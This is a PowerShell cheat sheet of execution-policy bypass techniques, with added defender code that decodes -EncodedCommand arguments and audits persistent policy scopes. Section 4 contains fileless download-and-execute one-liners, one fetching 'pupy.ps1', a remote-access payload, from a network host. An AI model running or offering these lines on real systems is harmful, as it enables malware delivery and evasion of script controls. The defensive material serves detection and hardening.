POLICY STATUS
PS C:\> Get-ExecutionPolicy    (returns the effective policy, e.g. Restricted or Bypass)
POLICY SCOPE
Get-ExecutionPolicy -List | Format-Table -AutoSize
BYPASS POLICY
1. COPY & PASTE
PS> write-host "string to execute"
CMD> Powershell -command "Write-Host 'My voice is my passport, verify me.'"
CMD> Powershell -c "Write-Host 'My voice is my passport, verify me.'"
2. ECHO SCRIPT
CMD> Echo Write-Host "powershell script" | PowerShell.exe -noprofile -
3. FROM FILE, PIPE TO STANDARD INPUT
Get-Content .\runme.ps1 | PowerShell.exe -noprofile -
or
TYPE .\runme.ps1 | PowerShell.exe -noprofile -
4. ONE-LINER
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
Download Script from URL and Execute with Invoke Expression
This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn’t result in any configuration changes.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.43.221/pupy.ps1')"
5. ENCODED
$command = "Write-Host 'My voice is my passport, verify me.'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand
AFTER ENCODING
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
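Defenders meet the encoded form above in process-creation telemetry (Security event 4688 with command-line auditing enabled, or Sysmon event 1), where the Base64 hides what actually ran. The decoder below is an added example, not code from the original page or from the NetSPI post it references. It reverses the encoding shown in section 5 (Base64 of UTF-16LE), accepts the parameter prefixes powershell.exe recognises for -EncodedCommand while rejecting -ExecutionPolicy, and runs over a constructed set of sample command lines, the first of which carries the page's own encoded string.

```powershell
# Added example (not from the original page): decode the -EncodedCommand
# argument of a PowerShell command line as captured in process-creation
# telemetry (Security event 4688 with command-line auditing, Sysmon event 1).

function ConvertFrom-EncodedCommandLine {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$CommandLine
    )
    process {
        # powershell.exe accepts any unambiguous prefix of -EncodedCommand
        # (-e, -ec, -en, -enc, ...). The alternation below accepts those and
        # rejects -ExecutionPolicy / -ep, which also start with "-e".
        $pattern = '(?i)(?<![\w-])-e(?:c|n[a-z]*)?\s+(?<b64>[A-Za-z0-9+/=]+)'
        $match = [regex]::Match($CommandLine, $pattern)

        $result = [ordered]@{
            CommandLine = $CommandLine
            Encoded     = $match.Success
            Decoded     = $null
            Note        = 'no -EncodedCommand argument'
        }

        if ($match.Success) {
            try {
                $bytes = [Convert]::FromBase64String($match.Groups['b64'].Value)
                # Reverse of section 5: Base64 -> bytes -> UTF-16LE ("Unicode") text.
                $result.Decoded = [System.Text.Encoding]::Unicode.GetString($bytes)
                $result.Note = if ($bytes.Length % 2 -ne 0) {
                    'odd byte count: payload is not well-formed UTF-16LE'
                } else {
                    'decoded'
                }
            } catch [System.FormatException] {
                $result.Note = 'argument is not valid Base64'
            }
        }
        [pscustomobject]$result
    }
}

# Constructed sample command lines: the first carries the page's own encoded
# string, the second uses a different "-E..." parameter and must not decode,
# the third has an argument that is not Base64.
$samples = @(
    'powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA',
    'powershell.exe -ExecutionPolicy Bypass -File .\runme.ps1',
    'powershell.exe -e notbase64!!'
)

$samples | ConvertFrom-EncodedCommandLine | Format-List
```

The first sample decodes back to the Write-Host line from section 5; the second reports no encoded argument; the third reports invalid Base64 rather than throwing, so the function can be piped over a whole export of command lines without stopping on malformed entries.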
6. INVOKE COMMAND
invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force
7. INVOKE EXPRESSION
Get-Content .\runme.ps1 | Invoke-Expression
or
GC .\runme.ps1 | iex
RESTRICT / BYPASS EXECUTION POLICY
RUN WITHOUT CONFIG CHANGE
PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1
FOR UNSIGNED SCRIPTS
PowerShell.exe -ExecutionPolicy Unrestricted -File .\runme.ps1
SIGN IT http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
THEN USE
PowerShell.exe -ExecutionPolicy RemoteSigned -File .\runme.ps1
STATUS OF SCOPE
Get-ExecutionPolicy -Scope Process
FOR PROCESS (SESSION)
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
FOR USER, PERSISTENT VIA REG KEY
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
MODIFYING REG KEY (PERSISTENT)
HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
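The scope commands above show two kinds of change: a Process-scope setting that vanishes with the session, and CurrentUser / LocalMachine settings that persist in the registry. The audit function below is an added example, not code from the original page or the NetSPI post. It lists every scope, reads the ExecutionPolicy value behind the two persistent non-policy scopes (the HKCU key given above and its HKLM counterpart for LocalMachine, which is an assumption based on the standard Windows PowerShell 5.1 layout; pwsh 7 stores these in powershell.config.json instead), and flags any persistent scope set to Bypass or Unrestricted. The group-policy scopes (MachinePolicy, UserPolicy) are reported from Get-ExecutionPolicy -List only.

```powershell
# Added example (not from the original page): audit execution-policy scopes
# and the registry values that make the CurrentUser/LocalMachine scopes
# persistent. Targets Windows PowerShell 5.1 (powershell.exe).

function Get-ExecutionPolicyAudit {
    [CmdletBinding()]
    param(
        # Policies treated as "loosened" when found in a persistent scope.
        [string[]]$LoosePolicies = @('Bypass', 'Unrestricted')
    )

    # Registry keys backing the persistent scopes. The HKCU path is the one
    # given on the page; the HKLM path is its LocalMachine counterpart
    # (assumption: standard Windows PowerShell 5.1 layout).
    $regKeys = @{
        CurrentUser  = 'HKCU:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
        LocalMachine = 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
    }

    # Scopes whose setting survives the current session; Process does not.
    $persistentScopes = @('MachinePolicy', 'UserPolicy', 'LocalMachine', 'CurrentUser')

    foreach ($entry in Get-ExecutionPolicy -List) {
        $scope  = $entry.Scope.ToString()
        $policy = $entry.ExecutionPolicy.ToString()

        # Read the raw registry value where one exists, so a mismatch between
        # what the cmdlet reports and what is on disk is visible.
        $regValue = $null
        if ($regKeys.ContainsKey($scope)) {
            $regValue = (Get-ItemProperty -Path $regKeys[$scope] -Name ExecutionPolicy `
                -ErrorAction SilentlyContinue).ExecutionPolicy
        }

        $isPersistent = $persistentScopes -contains $scope
        [pscustomobject]@{
            Scope         = $scope
            Policy        = $policy
            RegistryValue = $regValue
            Persistent    = $isPersistent
            Finding       = $isPersistent -and ($LoosePolicies -contains $policy)
        }
    }
}

# Effective policy is the first non-Undefined scope in precedence order,
# which Get-ExecutionPolicy without arguments already resolves.
Get-ExecutionPolicyAudit | Format-Table -AutoSize
"Effective policy: $(Get-ExecutionPolicy)"
```

A row with Finding = True is a configuration drift to correct (for example `Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned`, or Undefined to clear the scope). Treat it as that and no more: the execution policy is a guard against accidentally running scripts, not a security boundary, which is why every technique on this page works; restricting what scripts can run needs application control and command-line logging, not a stricter policy value.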
REF : https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/